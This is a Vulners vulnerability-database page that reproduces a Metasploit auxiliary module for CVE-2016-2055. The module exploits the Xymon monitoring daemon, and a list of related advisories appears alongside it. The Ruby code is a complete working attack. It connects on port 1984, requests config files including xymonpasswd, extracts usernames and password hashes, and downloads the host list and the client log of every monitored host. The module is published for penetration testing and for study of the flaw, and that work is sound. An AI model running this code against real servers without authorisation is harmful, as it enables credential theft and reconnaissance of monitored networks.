Vulners
Lucene search
Xymon Daemon Gather Information
🗓️ 31 Aug 2024 00:00:00Reported by Brendan Coles, Markus Krell, metasploit.comType 
packetstorm🔗 packetstormsecurity.com👁 162 Views
| Reporter | Title | Published | Views | Family All 27 |
|---|---|---|---|---|
 | xymon-server -- multiple vulnerabilities | 19 Jan 201600:00 | – | freebsd |
 | CVE-2016-2055 | 15 Aug 201915:37 | – | circl |
 | Xymon Information Disclosure Vulnerability | 24 Feb 201600:00 | – | cnvd |
 | CVE-2016-2055 | 13 Apr 201616:00 | – | cve |
 | CVE-2016-2055 | 13 Apr 201616:00 | – | cvelist |
 | [SECURITY] [DLA 488-1] xymon security update | 25 May 201617:10 | – | debian |
| [SECURITY] [DSA 3495-1] xymon security update | 29 Feb 201610:15 | – | debian |
| [SECURITY] [DSA 3495-1] xymon security update | 29 Feb 201610:15 | – | debian |
 | CVE-2016-2055 | 13 Apr 201616:00 | – | debiancve |
 | Debian DLA-488-1 : xymon security update | 26 May 201600:00 | – | nessus |
10
`##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::Tcp
include Msf::Auxiliary::Report
def initialize
super(
'Name' => 'Xymon Daemon Gather Information',
'Description' => %q{
This module retrieves information from a Xymon daemon service
(formerly Hobbit, based on Big Brother), including server
configuration information, a list of monitored hosts, and
associated client log for each host.
This module also retrieves usernames and password hashes from
the `xymonpasswd` config file from Xymon servers before 4.3.25,
which permit download arbitrary config files (CVE-2016-2055),
and servers configured with `ALLOWALLCONFIGFILES` enabled.
},
'Author' => [
'Markus Krell', # CVE-2016-2055 discovery
'bcoles' # Metasploit
],
'License' => MSF_LICENSE,
'References' =>
[
['CVE', '2016-2055'],
['PACKETSTORM', '135758'],
['URL', 'https://lists.xymon.com/pipermail/xymon/2016-February/042986.html'],
['URL', 'https://xymon.sourceforge.net/'],
['URL', 'https://en.wikipedia.org/wiki/Xymon'],
['URL', 'https://en.wikipedia.org/wiki/Big_Brother_(software)']
]
)
register_options [Opt::RPORT(1984)]
end
def xymon_send(cmd)
vprint_status "Sending: #{cmd}"
connect
sock.puts cmd
sock.shutdown(:WR)
return sock.get(5)
ensure
disconnect
end
def run
res = xymon_send('ping').to_s
unless res.starts_with? 'xymond'
print_error 'Target is not a Xymon daemon'
return
end
version = res.scan(/^xymond ([\d\.]+)/).flatten.first
unless version
print_error 'Could not retrieve Xymon version'
end
print_status "Xymon daemon version #{version}"
service_data = {
address: rhost,
port: rport,
service_name: 'xymond',
protocol: 'tcp',
info: version,
workspace_id: myworkspace_id
}
xymond_service = report_service(service_data)
print_status 'Retrieving configuration files ...'
%w(xymonserver.cfg hosts.cfg xymonpasswd).each do |config|
res = xymon_send("config #{config}").to_s
if res.blank?
print_error "Could not retrieve #{config}"
next
end
path = store_loot(
"xymon.config.#{config.sub(/\.cfg$/, '')}",
'text/plain',
target_host,
res,
nil,
"config #{config}",
xymond_service
)
print_good "#{config} (#{res.size} bytes) stored in #{path}"
if config == 'xymonpasswd'
res.each_line.map {|l| l.strip}.reject{|l| l.blank? || l.starts_with?('#')}.each do |c|
user = c.split(':')[0].to_s.strip
hash = c.split(':')[1].to_s.strip
print_good("Credentials: #{user} : #{hash}")
credential_data = {
module_fullname: fullname,
origin_type: :service,
private_data: hash,
private_type: :nonreplayable_hash,
jtr_format: Metasploit::Framework::Hashes.identify_hash(hash),
username: user
}.merge(service_data)
login_data = {
core: create_credential(credential_data),
status: Metasploit::Model::Login::Status::UNTRIED
}.merge(service_data)
create_credential_login(login_data)
end
end
end
print_status 'Retrieving host list ...'
res = xymon_send('hostinfo').to_s
if res.blank?
print_error 'Could not retrieve client host list'
return
end
path = store_loot(
'xymon.hostinfo',
'text/plain',
target_host,
res,
nil,
'hostinfo',
xymond_service
)
print_good "Host info (#{res.size} bytes) stored in #{path}"
hosts = res.each_line.map {|line| line.split('|').first}.reject {|host| host.blank?}
if hosts.empty?
print_error 'Found no client hosts'
return
end
print_good "Found #{hosts.size} hosts"
print_status 'Retrieving client logs ...'
hosts.each do |host|
res = xymon_send("clientlog #{host}")
unless res
print_error "Could not retrieve client log for #{host}"
next
end
if res.blank?
print_status "#{host} client log is empty"
next
end
path = store_loot(
"xymon.hosts.#{host}",
'text/plain',
target_host,
res,
nil,
"clientlog #{host}",
xymond_service
)
print_good "#{host} client log (#{res.size} bytes) stored in #{path}"
end
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
rescue Timeout::Error => e
print_error(e.message)
end
end
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
31 Aug 2024 00:00Current
7High risk
Vulners AI Score7
CVSS 25
CVSS 37.5
EPSS0.67997